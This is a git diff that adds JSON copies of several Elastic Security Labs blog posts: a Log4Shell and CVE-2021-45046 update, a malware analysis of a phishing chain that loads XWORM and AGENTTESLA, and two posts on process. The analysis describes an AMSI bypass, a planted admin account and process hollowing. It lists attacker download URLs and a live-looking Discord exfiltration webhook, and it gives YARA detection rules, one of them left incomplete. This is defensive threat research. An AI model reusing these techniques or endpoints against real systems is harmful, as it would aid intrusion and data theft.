diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-analysis_of_log4shell_cve_2021_45046-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-analysis_of_log4shell_cve_2021_45046-md.json
new file mode 100644
index 00000000000..b9a6828543b
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-analysis_of_log4shell_cve_2021_45046-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Analysis of Log4Shell vulnerability & CVE-2021-45046\"\nslug: \"analysis-of-log4shell-cve-2021-45046\"\ndate: \"2022-11-30\"\ndescription: \"In this post, we cover next steps the Elastic Security team is taking for users to continue to protect themselves against CVE-2021-44228, or Log4Shell.\"\nauthor:\n - slug: jake-king\nimage: \"photo-edited-12-e.jpg\"\ncategory:\n - slug: security-research\n - slug: vulnerability-updates\n---\n\n> _To understand how Elastic is currently assessing internal risk of this vulnerability in our products please see the advisory_[_here._](https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476)\n>\n> _This document was updated on December 17, 2021 to reflect a revised CVSS score for CVE-2021-45046, and new findings by the community._\n\nIn recent days Log4Shell, or CVE-2021-44228, has dominated the news cycle in the world of information security and beyond. Elastic released an [advisory](https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476?ultron=log4js-exploit&blade=announcement&hulk=email&mkt_tok=ODEzLU1BTS0zOTIAAAGBU8N1ZUOwzTcRbJCOiByHmeYiopMnarq-QPWBIyhPI3Vvsp6w-4q4PBbTGZ3fZ0sB75cpaUdOddA1k-6-yh3QwAicvJTgafdJWv_-9Cn2GoKLvsmt) detailing how Elastic products and users are impacted, and a [blog](https://www.elastic.co/blog/detecting-log4j2-with-elastic-security?ultron=log4js-exploit&blade=announcement&hulk=email&mkt_tok=ODEzLU1BTS0zOTIAAAGBU8N1ZDYRbFq2QZ4ZK8tc2IbDatArsdI6WGcA2M90g4v02svJeqCXFeZ23R4TjeYii4KBGAkqMBgWc5IkxYrmefgwZBanjGQh8v66drUymiVSQFvs) post describing how our users can leverage Elastic Security to help defend their networks.\n\nMany readers have further questions as to how we’re tracking this issue within Elastic Security, what our coverage is now, and what we’re expecting to do next. 
This post outlines a few details for our current status, and provides details regarding a new, related vulnerability: CVE-2021-45046.\n\n## Elastic Security response\n\nAs you may imagine, the team has worked tirelessly to ensure that we’re developing detections for both active exploitation of the vulnerability, as well as post-compromise indicators, and will continue active development until further notice.\n\nWe’re spending time focusing on detailed detections that better align with some of the emerging trends that adversaries are now taking advantage of as they have time to develop their attack strategies. And we’re not working in silence — those that may have had a chance to catch up on our [original post](https://www.elastic.co/blog/detecting-log4j2-with-elastic-security) a few days ago will be pleasantly surprised we’ve added further detections and hunting examples, and will continue to do so as we learn more with the community.\n\nAlongside the threat research and signature development, we’ve noted some interesting observations:\n\n- We noted several instances of [generic crypto miners](https://www.virustotal.com/gui/file/5b25db204b5cd5cc3193f4378dd270dced80da9d39874d8b6fdd75e97d2cc907/detection) for Linux being deployed that appeared to be related to exploitation of this CVE, but determined that they are benign true positives\n- We’ve stopped at least eight different families of malware being deployed using the log4j exploit, indicating widespread adoption of the exploit by threats of all kinds\n- While we are observing coverage across our full protection suite (such as behavior protection), it is noteworthy that our free basic-tier malware protection is successfully preventing initial access\n\nWe will aim to keep users and readers apprised of findings, and hope to share additional observations in the wild as we see them.\n\n## A new contender: CVE-2021-45046\n\nWhile we watch the CVE-2021-44228 (Log4Shell) vulnerability dominate the news cycles, a new 
contender, [CVE-2021-45046](https://nvd.nist.gov/vuln/detail/CVE-2021-45046), was accidentally introduced in Log4j2 version 2.15.0, allowing adversaries to invoke a denial of service condition and, as was later determined, remote code execution through specially crafted payloads. Previous mitigations to avoid information disclosure vulnerabilities by setting the `log4j2.formatMsgNoLookups` property to `true` do not mitigate against this new finding, according to the CVE details.\n\nWhile CVE-2021-45046 initially carried a lower CVSS score of 3.7 due to the impact of the initially discovered condition, this was re-evaluated to a 9.0, indicating limited remote code execution was possible. The finding was shared on December 16, 2021 by [Alvaro Muñoz](https://twitter.com/pwntester/status/1471465662975561734), who identified that while the default setting formatMsgNoLookups was accurately set to true, there were alternative locations for lookups to take place. Technical details are still unfolding from the community; however, the Log4j2 team shared the following message within their security updates:\n\n_The reason these measures are insufficient is that, in addition to the Thread Context attack vector mentioned above, there are still code paths in Log4j where message lookups could occur: known examples are applications that use Logger.printf(\"%s\", userInput), or applications that use a custom message factory, where the resulting messages do not implement StringBuilderFormattable. 
There may be other attack vectors._\n\n_The safest thing to do is to upgrade Log4j to a safe version, or remove the JndiLookup class from the log4j-core jar._ [_Reference here_](https://logging.apache.org/log4j/2.x/security.html)\n\nGiven this new information, and readily available [POCs](https://twitter.com/marcioalm/status/1471740771581652995) for exploitation, the Apache team has recommended those impacted upgrade to the latest, safe version of Log4j2, or alternatively remove the JndiLookup class from the log4j-core jar.\n\nElastic Security has observed many threat actors and benign scanners leveraging this new methodology already in some edge environments, with payloads incorporating previous attack methodologies such as key extraction attempts and base64-encoded payloads:\n\n\n\nWe anticipate adding further details as we learn them, and thank the team at LunaSec specifically for providing a [detailed, early summary](https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/) of this emerging situation, and of course, provide kudos to [Alvaro Muñoz](https://twitter.com/pwntester) of GitHub Security Lab for the findings.\n\n## Thank you (again!), from Elastic Security\n\nWe want to thank all of the security teams across the globe for your tireless work this week. As we referenced before, openness and collaboration in the security community to safeguard all users is paramount when facing such a serious and pervasive vulnerability.\n\nExisting Elastic Security users can access these capabilities within the product. If you’re new to Elastic Security, take a look at our [Quick Start guides](https://www.elastic.co/training/elastic-security-quick-start) (bite-sized training videos to get you started quickly) or our [free fundamentals training courses](https://www.elastic.co/training/free#fundamentals).\n\nGet started with a [free 14-day trial of Elastic Cloud](https://cloud.elastic.co/registration). 
Or [download](https://www.elastic.co/downloads/) the self-managed version of the Elastic Stack for free.\n\n### References\n\n[https://logging.apache.org/log4j/2.x/security.html](https://logging.apache.org/log4j/2.x/security.html)\n\n[https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/](https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/)\n"
+ },
+ "title": "Analysis of Log4Shell vulnerability & CVE-2021-45046",
+ "slug": "analysis-of-log4shell-cve-2021-45046",
+ "date": "2022-11-30",
+ "description": "In this post, we cover next steps the Elastic Security team is taking for users to continue to protect themselves against CVE-2021-44228, or Log4Shell.",
+ "author": [
+ {
+ "slug": "jake-king"
+ }
+ ],
+ "image": "photo-edited-12-e.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "vulnerability-updates"
+ }
+ ]
+ },
+ "id": "security_labs_content-analysis_of_log4shell_cve_2021_45046-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-attack_chain_leads_to_xworm_and_agenttesla-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-attack_chain_leads_to_xworm_and_agenttesla-md.json
new file mode 100644
index 00000000000..11e56371953
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-attack_chain_leads_to_xworm_and_agenttesla-md.json
@@ -0,0 +1,31 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Attack chain leads to XWORM and AGENTTESLA\"\nslug: \"attack-chain-leads-to-xworm-and-agenttesla\"\ndate: \"2023-04-10\"\ndescription: \"Our team has recently observed a new malware campaign that employs a well-developed process with multiple stages. The campaign is designed to trick unsuspecting users into clicking on the documents, which appear to be legitimate.\"\nauthor:\n - slug: salim-bitam\nimage: \"blog-thumb-coin-stacks.jpg\"\ncategory:\n - slug: attack-pattern\n - slug: malware-analysis\ntags:\n - xworm\n - agenttesla\n---\n\n## Key Takeaways\n\n- Threat actors are deploying known malware using their own custom .NET loaders\n- The threat actors employ simple and well-known tactics such as bypassing AMSI through patching and a basic custom .NET loader\n- The threat actors are abusing legitimate free file hosting services\n\n## Preamble\n\nOur team has recently observed a new malware campaign that employs a well-developed process with multiple stages. The campaign is designed to trick unsuspecting users into clicking on the documents, which appear to be legitimate but are in fact fake. The adversary leverages weaponized Word documents to execute malicious PowerShell scripts and also utilizes a custom obfuscated .NET loader to load various malware strains, including XWORM and AGENTTESLA.\n\n## RTF loader code analysis\n\n### Overview\n\nDuring a recent investigation, we discovered a malicious Word document named `Card & Booking Details.docx`. This document has been designed with the intent to deceive the victim and includes two falsified scanned documents, namely a credit card and a passport.\n\nUpon opening the document, an RTF object hosted at `www.mediafire[.]com/file/79jzbqigitjp2v2/p2.rtf` is fetched.\n\nThis RTF object contains a macro-enabled Excel object. 
When opened, this macro downloads an obfuscated PowerShell script which in turn deploys different malware families.\n\nAt the time of this writing, we have observed two distinct malware families, namely XWORM and AGENTTESLA, deployed through this execution chain. Both malware families mentioned above are loaded into the compromised system's memory by the same custom .NET loader. Once loaded, the malicious payload can carry out a range of functions, such as stealing sensitive data and executing commands on the compromised system.\n\n\n\nIn this research post, we will walk through the initial execution of the malware and detail the capabilities we discovered.\n\n### Extracting the malicious VBA\n\nThe RTF document contains multiple embedded objects, including an interesting one that caught our attention: `Excel.SheetMacroEnabled`.\n\n\n\nWe can use [`rtfdump.py`](https://github.com/DidierStevens/DidierStevensSuite/blob/master/rtfdump.py), a script developed by Didier Stevens to analyze RTF files, to dump the object and [`olevba.py`](https://www.decalage.info/python/olevba), a script developed by Philippe Lagadec, to extract any embedded VBA scripts from an [OLE](https://en.wikipedia.org/wiki/Object_Linking_and_Embedding) object. The extracted VBA script shown below downloads and executes a malicious PowerShell script from `https://www.mediafire[.]com/file/xnqxmqlcj51501d/7000m.txt/file`.\n\n\n\n### PowerShell script analysis\n\nThe malicious PowerShell script is obfuscated using string substitution to evade detection and make analysis more difficult.\n\n\n\nIt contains additional PowerShell script blocks in hex format that will be deployed on the infected machine, designed to prepare the environment by setting up persistence, bypassing AMSI, disabling Windows Defender, and creating a mechanism to update the malware. 
The ultimate objective is to install two .NET binaries, namely a loader and a payload (XWORM / AGENTTESLA).\n\n### Deleting the malicious document\n\nThe malware starts by deleting the original Word document, first killing the process `Winword.exe` and then deleting all .DOCX files located in the default `Downloads` and `Desktop` folders of every user. This initial step shows the malware's destructive nature and how it can potentially harm the user's data.\n\n\n\n### Persistence\n\nThe malware creates a directory in the path `C:\\ProgramData\\MinMinons`, which is used to store other PowerShell scripts and binaries. The currently running PowerShell script is then copied to `C:\\ProgramData\\MinMinons\\Candlegraphy.\\_\\_\\_`.\n\nNext, the malware deobfuscates the first embedded PowerShell script, which is used to create persistence. It first writes a JScript file that invokes the original PowerShell script saved in `C:\\ProgramData\\MinMinons\\Candlegraphy.\\_\\_\\_` through an ActiveXObject shell, then a scheduled task named “MOperaChrome” is created to run the JScript file using the Microsoft-signed [Windows Script Host (WSH) utility](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wscript), `wscript.exe`.\n\n\n\n### AMSI bypass\n\nThe second embedded PowerShell script is responsible for bypassing AMSI by patching the `amsiInitFailed` flag. In doing so, the initialization of AMSI fails, preventing any scan from being initiated for the ongoing process. Furthermore, the PowerShell script proceeds to disable the Microsoft Windows Defender service.\n\n\n\n### User creation\n\nThe script creates a local administrator account named “System32” and adds it to the Remote Desktop Users group. This enables the attacker to log in via Remote Desktop Protocol (RDP). 
Next, the script disables the machine's firewall to allow inbound RDP connection attempts which aren’t filtered by edge controls.\n\n\n\n### Malware update persistence\n\nThe third embedded script stores a secondary JScript file, whose purpose is downloading a revised or updated version of the malware. This file is saved to a predetermined location at `C:\\ProgramData\\MinMinons\\miguan.js`. Furthermore, a scheduled task named “miguaned” is created to execute the JScript file through `wscript.exe`, similar to the previously described task.\n\nThe JScript creates an instance of the `WScript.Shell` object by calling ActiveXObject with the CLSID `{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}`, which corresponds to the Shell Object, then downloads the updated PowerShell malware from the URL `https://billielishhui.blogspot[.]com/atom.xml`.\n\n\n\n### .NET loader\n\nThe custom .NET loader employs the [P/INVOKE technique](https://learn.microsoft.com/en-us/dotnet/standard/native-interop/pinvoke) to call the native Windows API and inject a payload into a signed Microsoft binary via [process hollowing](https://attack.mitre.org/techniques/T1055/012/).\n\nThe loader’s code employs various obfuscation techniques to hinder analysis, including dead instructions, renamed symbols, and encoded strings, all of which make the code less readable. Fortunately, a tool like [de4dot](https://github.com/de4dot/de4dot) can be used to output a human-readable version of it.\n\n\n\nThe malware leverages the `LoadLibrary` and `GetProcAddress` APIs to access the required Windows APIs. To obscure the names of these APIs, the loader stores them in an encoded format within the binary file, utilizing a sequence of substitution and string reversal methods.\n\n\n\nThe loader then starts a process in a suspended state using the `CreateProcessA` API. 
The following is the list of executables it uses as a host for its malicious code:\n\n- `C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe`\n- `C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe`\n- `C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe`\n\nThese binaries are signed and trusted by the system and can evade detection by security software that relies on whitelisting system processes. It then uses `ZwUnmapViewOfSection` to unmap the memory of the target process, writes the payload into the suspended process, and then resumes the thread using the `ResumeThread` API.\n\n### Final payload\n\nDuring our research we discovered that the threat actor has been deploying different payloads. Namely, we observed two families: XWORM and AGENTTESLA.\n\nXWORM has gained notoriety in the underground criminal marketplace due to its ability to employ sophisticated capabilities like virtualization and sandbox detection, used to avoid detection and support persistence within an infected system.\n\nOf particular concern is the fact that XWORM is readily available on the internet as a cracked version, with version 2.1 being especially prevalent. This highlights the dangers of underground cybercrime markets and the ease with which malicious actors can access and utilize powerful tools.\n\nTwo different versions of the XWORM family were observed: versions 2.2 and 3.1. The following is the configuration of a XWORM sample in plain text.\n\n\n\nAGENTTESLA is a trojan and credential stealer written in .NET. While it first emerged in 2014, it remains among the most active malware families. AGENTTESLA is affordably priced and includes support from the developers, making it easily accessible to cybercriminals with limited technical skills.\n\nThe sample we analyzed was heavily obfuscated, masqueraded as an AVG installer, and leverages Discord for C2. 
It uploads stolen information to the attacker’s Discord channel via the following webhook: `https://discord[.]com/api/webhooks/1089956337733087274/uYNA_D8Ns1z9NZ3B1mGp0XXyGq-785KLGIfEAZsrz3TJd5fvOjXA927F7bUTTzbNT6Zk`.\n\n\n\n\n\n## Observed adversary tactics and techniques\n\nElastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that threats use.\n\n## Tactics\n\nTactics represent the “why” of a technique or sub-technique. They represent the adversary’s tactical goals: the reason for performing an action.\n\n- [Initial access](https://attack.mitre.org/tactics/TA0001)\n- [Execution](https://attack.mitre.org/tactics/TA0002)\n- [Persistence](https://attack.mitre.org/tactics/TA0003)\n- [Command and control](https://attack.mitre.org/tactics/TA0011)\n- [Defense evasion](https://attack.mitre.org/tactics/TA0005)\n\n## Techniques/subtechniques\n\nTechniques and sub-techniques represent how an adversary achieves a tactical goal by performing an action.\n\n- [Process injection](https://attack.mitre.org/techniques/T1055/)\n- [Indicator removal: File deletion](https://attack.mitre.org/techniques/T1070/004/)\n- [Scheduled task/job: Scheduled task](https://attack.mitre.org/techniques/T1053/005/)\n- [User Execution: Malicious File](https://attack.mitre.org/techniques/T1204/002/)\n- [Phishing: Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001/)\n- [Command and Scripting Interpreter: PowerShell](https://attack.mitre.org/techniques/T1059/001/)\n- [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027/)\n- [Impair Defenses: Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001/)\n- [Create Account](https://attack.mitre.org/techniques/T1136/)\n\n## Detection logic\n\n### YARA\n\nElastic Security has created YARA rules to identify this activity. 
Below are YARA rules to identify XWORM and [AGENTTESLA](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_AgentTesla.yar) malware families.\n\n```\nrule Windows_Trojan_Xworm_732e6c12 {\nmeta:\n author = \"Elastic Security\"\n id = \"732e6c12-9ee0-4d04-a6e4-9eef874e2716\"\n fingerprint = \"afbef8e590105e16bbd87bd726f4a3391cd6a4489f7a4255ba78a3af761ad2f0\"\n creation_date = \"2023-04-03\"\n last_modified = \"2023-04-03\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"Xworm\"\n threat_name = \"Windows.Trojan.Xworm\"\n source = \"Manual\"\n maturity = \"Diagnostic\"\n reference_sample = \"bf5ea8d5fd573abb86de0f27e64df194e7f9efbaadd5063dee8ff9c5c3baeaa2\"\n scan_type = \"File, Memory\"\n severity = 100\n\nstrings:\n $str1 = \"startsp\" ascii wide fullword\n $str2 = \"injRun\" ascii wide fullword\n $str3 = \"getinfo\" ascii wide fullword\n $str4 = \"Xinfo\" ascii wide fullword\n $str5 = \"openhide\" ascii wide fullword\n $str6 = \"WScript.Shell\" ascii wide fullword\n $str7 = \"hidefolderfile\" ascii wide fullword\ncondition:\n all of them}\n\nrule Windows_Trojan_AgentTesla_d3ac2b2f {\nmeta:\n author = \"Elastic Security\"\n id = \"d3ac2b2f-14fc-4851-8a57-41032e386aeb\"\n fingerprint = \"cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc\"\n creation_date = \"2021-03-22\"\n last_modified = \"2022-06-20\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"AgentTesla\"\n threat_name = \"Windows.Trojan.AgentTesla\"\n source = \"Manual\"\n maturity = \"Diagnostic, Production\"\n reference_sample = \"65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4\"\n scan_type = \"File, Memory\"\n severity = 100\n\nstrings:\n $a1 = \"GetMozillaFromLogins\" ascii fullword\n $a2 = \"AccountConfiguration+username\" wide fullword\n $a3 = \"MailAccountConfiguration\" ascii fullword\n $a4 = \"KillTorProcess\" ascii fullword\n $a5 = \"SmtpAccountConfiguration\" ascii 
fullword\n $a6 = \"GetMozillaFromSQLite\" ascii fullword\n```\n"
+ },
+ "title": "Attack chain leads to XWORM and AGENTTESLA",
+ "slug": "attack-chain-leads-to-xworm-and-agenttesla",
+ "date": "2023-04-10",
+ "description": "Our team has recently observed a new malware campaign that employs a well-developed process with multiple stages. The campaign is designed to trick unsuspecting users into clicking on the documents, which appear to be legitimate.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ }
+ ],
+ "image": "blog-thumb-coin-stacks.jpg",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ },
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "xworm",
+ "agenttesla"
+ ]
+ },
+ "id": "security_labs_content-attack_chain_leads_to_xworm_and_agenttesla-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-automating_security_protections_rapid_response_to_malware-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-automating_security_protections_rapid_response_to_malware-md.json
new file mode 100644
index 00000000000..d1bf583c46a
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-automating_security_protections_rapid_response_to_malware-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Automating the Security Protections rapid response to malware\"\nslug: \"automating-security-protections-rapid-response-to-malware\"\ndate: \"2023-03-01\"\ndescription: \"See how we’ve been improving the processes that allow us to make updates quickly in response to new information and propagate those protections to our users, with the help of machine learning models.\"\nauthor:\n - slug: samantha-zeitlin\nimage: \"blog-security-endpoint-720x420.png\"\ncategory:\n - slug: machine-learning\n - slug: detection-science\n---\n\nCyber attacks on corporate networks were [up 50% in 2021](https://www.forbes.com/sites/chuckbrooks/2022/01/21/cybersecurity-in-2022--a-fresh-look-at-some-very-alarming-stats/?sh=675676ea6b61), and it’s [expected that 2022 will see more of the same](https://www.govtech.com/blogs/lohrmann-on-cybersecurity/the-top-22-security-predictions-for-2022). [Elastic Endpoint Security](https://www.elastic.co/endpoint-security/) includes a variety of protection layers to ensure maximum coverage against different types of malware. There have been a few examples recently of the need for [fast, accurate updates](https://www.elastic.co/blog/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper) of user environments in order to protect against the latest malware. Here at Elastic, we’ve been improving the processes that allow us to make updates quickly in response to new information and propagate those protections to our users.\n\nAs part of our security solution, we use a machine learning model to help us detect malware based on known characteristics. Since machine learning is never perfect, we deploy supplemental artifacts, including lists of known file hashes that range from malicious to benign. There are two scenarios when we might need to update these lists, which we’ll cover here. 
Using these, teams can experience a much faster response to malware.\n\n[Related article: [Sandboxing anti-malware products for fun and profit](https://www.elastic.co/blog/sandboxing-anti-malware-products-for-fun-and-profit)]\n\n## Scenario 1: The model isn’t perfect\n\nThis happens pretty rarely, since our model has True Negative rates of 99.8%. But no model is perfect, and our True Positive rates vary from 99% (which is great) down to 97.9%, due to noisy data — particularly large bursts of near-duplicates. In applying machine learning to cybersecurity, data drift is an ever-present challenge and part of what makes it such an interesting problem.\n\nThere are a couple of ways we can find out if our model is doing the wrong thing:\n\n1. **User feedback.**\n\nA user sends us an email telling us that a piece of custom software is being flagged as malware, but is actually safe.\n\n2. **Telemetry data coming back from our model running on customers’ machines.**\n\nWe look at the volume and velocity of alerts, using Elastic’s Anomaly Detection feature to let us know if there is a sudden spike from a particular file. We also use patterns to help us confirm if an alert is coming from a single noisy machine, a test cluster, or a legitimate threat.\n\nThe advantage of using lists as a backstop to machine learning is that it’s a fast and easy way to make sure our customers are protected from new malware, as well as protecting them from unnecessary noise from false positives.\n\n## Scenario 2: New forms of malware appear\n\nWe typically find out about new kinds of malware from either security news/community resources, or our own Security Intelligence and Analytics team identifying new kinds of malware.\n\nWhen this happens, we can easily deploy small changes to lists. 
We update the model separately, because that takes longer.\n\nWe’ve been steadily adding more automation to make this process of deploying updated lists to customers smoother and faster, with the goal of making it easy for anyone on the team to create and deploy an update. We’ve also been working on making the process of updating the model easier and faster.\n\n## Threats yet discovered…\n\nThe Elastic Security Intelligence and Analytics team continues to research and respond to groundbreaking threats in its mission to help Elastic customers and the broader security community. If you’re using [Elastic Security](https://www.elastic.co/security?utm_source=log4j+hub+blog&utm_medium=embed+link&utm_campaign=log4j_hub_blog&utm_id=log4j&utm_content=elastic+security) already, you can expect to see our latest findings in the newsfeed within the platform. We’ll also post our latest findings on [elastic.co/blog](https://www.elastic.co/blog).\n\nReady to become part of the Elastic Security community and take advantage of the team’s leading threat research? Get started with a free [14-day trial of Elastic Cloud](https://cloud.elastic.co/registration?utm_source=log4j+hub+blog&utm_medium=embed+link&utm_campaign=log4j_hub_blog&utm_id=log4j&utm_content=trail) or [download](https://www.elastic.co/downloads/?utm_source=log4j+hub+blog&utm_medium=embed+link&utm_campaign=log4j_hub_blog&utm_id=log4j&utm_content=download) the self-managed version of the Elastic Stack for free.\n"
+ },
+ "title": "Automating the Security Protections rapid response to malware",
+ "slug": "automating-security-protections-rapid-response-to-malware",
+ "date": "2023-03-01",
+ "description": "See how we’ve been improving the processes that allow us to make updates quickly in response to new information and propagate those protections to our users, with the help of machine learning models.",
+ "author": [
+ {
+ "slug": "samantha-zeitlin"
+ }
+ ],
+ "image": "blog-security-endpoint-720x420.png",
+ "category": [
+ {
+ "slug": "machine-learning"
+ },
+ {
+ "slug": "detection-science"
+ }
+ ]
+ },
+ "id": "security_labs_content-automating_security_protections_rapid_response_to_malware-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-behind_the_scenes_global_threat_report-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-behind_the_scenes_global_threat_report-md.json
new file mode 100644
index 00000000000..e1167adee8b
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-behind_the_scenes_global_threat_report-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Behind the scenes: The making of a Global Threat Report\"\nslug: \"behind-the-scenes-global-threat-report\"\ndate: \"2022-11-30\"\ndescription: \"What was our approach and process for creating a global threat report?\"\nauthor:\n - slug: mark-dufresne\nimage: \"gtr-blog-image-720x420.jpg\"\ncategory:\n - slug: reports\n---\n\nThe first [Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report) was published earlier this week. In it, you will learn about trends observed by our threat researchers, our predictions for what’s coming next, and some of our recommendations to operate securely in the face of today’s and tomorrow’s threats. If you haven’t read it yet, go [check it out](https://www.elastic.co/explore/security-without-limits/global-threat-report).\n\nAs a technical leader in [Elastic Security](http://www.elastic.co/security), I'd like to reveal a small amount about what goes into reports like this one and why it’s significant.\n\n## Why did we do it?\n\nIf you didn’t already know this, you know it now: Elastic is a security company. We are also different — we’re open and transparent. We share exactly how our detections and preventions work in the [protections-artifacts](https://github.com/elastic/protections-artifacts) and [detection-rules](https://github.com/elastic/detection-rules) repos. We’ve launched [Elastic Security Labs](https://www.elastic.co/security-labs/) and regularly publish our research, discoveries, and tools. Anyone can spin up a [trial](https://cloud.elastic.co/registration) and try all our features — no barriers, no sales BS. This report is another way we’re bringing transparency to you. We want to empower you by sharing what we know and what we think is coming, and we will continue to expand the scope of what we share in the coming months.\n\n## How'd we do it?\n\nPut simply, by analyzing a vast amount of data. 
Behind [Elastic Security Labs](http://www.elastic.co/security-labs) is a large team of malware and intelligence analysts, security engineers, researchers, data scientists, and other experts. This team builds and maintains all the protection features in Elastic’s security products: blocking malware, in-memory threats, ransomware, and other malicious behaviors. You name it, we do it. To do this effectively, we need visibility into how our features perform and what threats they’re coming in contact with. We get that visibility through anonymous telemetry shared with us by our users (as well as through research our team carries out on threat feeds and other public datasets).\n\nOur researchers are in the telemetry data daily. Usually, we are focused on the performance of particular features, eliminating false positives and adding protection against emergent techniques, some of which you can learn about in our [threat report](https://www.elastic.co/explore/security-without-limits/global-threat-report). This battle never ends, and we don’t anticipate that changing any time soon.\n\n## Why now?\n\nAs our user base rapidly grew over the past year, we came to the conclusion that we now observe a significant percentage of all threats. Upon hitting that critical mass, we decided to peel off some of our best researchers to zoom out, analyze the totality of what we’ve seen, and determine if we had a story worth sharing. We felt we probably had something to contribute to the community’s collective understanding of the threat landscape, and as you read the report, we hope you agree that we were right to think that.\n\n## Diving deeper\n\nWith that backdrop, I can share a bit more about how a report like this comes to be. Under the leadership of [Devon Kerr](https://twitter.com/_devonkerr_), we built an eight-week plan to analyze and summarize the telemetry coming in from our various features. 
All our event telemetry data lives in Elasticsearch, which makes for straightforward summarization and visualization.\n\nData normalization was a significant challenge. This included filtering out excessively noisy endpoints so results aren’t skewed, ignoring data from test clusters, ignoring alerts for data which we later realized were false positives, pulling together signals from our full [Elastic Security](http://www.elastic.co/security) solution, and more. It wasn’t the most glamorous work in the world, but it was foundational to producing meaningful results at the end. We’ll plan for a couple weeks in this phase again next time — it will always be a significant lift.\n\nOnce the data was in good shape, we extracted the meaning from raw aggregations of a massive number of events to determine insights worth sharing, which help us understand the present state of the threat landscape. In particular, we wanted to explain the most prevalent threats we're seeing and put them in context. These are patterns that ebb and flow throughout the year, making an annual overview particularly useful for spotting the threats making the biggest impact. This led to the various charts and statistics laid out in the report. It took us a couple weeks to settle on a list among the team.\n\nNext, we had to write. Devon, [Andy Pease](https://twitter.com/andythevariable), [Daniel Stepanic](https://twitter.com/DanielStepanic), and [Terrance DeJesus](https://twitter.com/_xDeJesus) did the heavy lifting here. Anyone who’s done technical writing knows how important clarity and conciseness are in delivering a message that can be understood by the general public. A few dozen pages came together in a way we’re proud of. 
Importantly, we partnered closely with [Dhrumil Patel](https://www.linkedin.com/in/pateldhrumil/), our product management lead, and [Jen Ellard](https://twitter.com/jellard8), our security product marketing lead, for the [Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report) effort to make sure our points were clear and meaningful to our user base.\n\nAll of that brought us to the end of our eight-week plan to develop the report. By late August, we were largely pencils-down on the content but far from done. We’re lucky to have a team of designers at Elastic to help us transform a wall of text in a Google doc into a PDF with style and graphics to enhance meaning and help our conclusions and recommendations jump off the page. We knew that this process would take time, many drafts, and a lot of back and forth. Planning and executing this piece of the project took about as long as the data gathering, analysis, and writing. We learned a lot about how long it takes to go from completed draft to final copy, and next time we will involve our internal partners early and often in the process.\n\n## Tell us what you think\n\nWe’d love to hear your feedback about the first [Elastic Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report). More is on the way. We expect to make this an annual publication, and between now and then we’re hoping to deliver a more interactive version of this inaugural report.\n"
+ },
+ "title": "Behind the scenes: The making of a Global Threat Report",
+ "slug": "behind-the-scenes-global-threat-report",
+ "date": "2022-11-30",
+ "description": "What was our approach and process for creating a global threat report?",
+ "author": [
+ {
+ "slug": "mark-dufresne"
+ }
+ ],
+ "image": "gtr-blog-image-720x420.jpg",
+ "category": [
+ {
+ "slug": "reports"
+ }
+ ]
+ },
+ "id": "security_labs_content-behind_the_scenes_global_threat_report-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-betting_on_bots-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-betting_on_bots-md.json
new file mode 100644
index 00000000000..316472bc663
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-betting_on_bots-md.json
@@ -0,0 +1,37 @@
+{
+ "attributes": {
+ "raw": {
